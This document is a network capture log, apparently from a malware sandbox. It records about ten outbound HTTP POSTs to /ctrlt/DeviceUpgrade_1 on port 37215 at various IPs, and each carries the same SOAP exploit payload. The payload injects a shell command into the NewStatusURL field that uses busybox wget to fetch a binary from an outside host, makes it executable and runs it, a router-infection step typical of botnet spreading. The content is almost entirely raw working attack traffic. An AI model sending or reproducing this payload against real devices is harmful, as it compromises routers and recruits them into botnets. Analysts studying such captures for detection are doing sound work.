                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1941192.168.2.155772031.33.116.15337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.083014011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1942192.168.2.153499631.88.247.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.083055973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1943192.168.2.1543342181.193.89.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.083055973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1944192.168.2.1546882222.94.161.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.083060980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1945192.168.2.1558020156.44.51.7637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.083275080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1946192.168.2.1544602181.238.128.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.083404064 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1947192.168.2.155797894.117.225.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.084053993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1948192.168.2.1541464197.42.103.20737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.084547997 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1949192.168.2.1560344102.180.216.5037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.084769011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1950192.168.2.1543670157.143.255.25437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.084824085 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
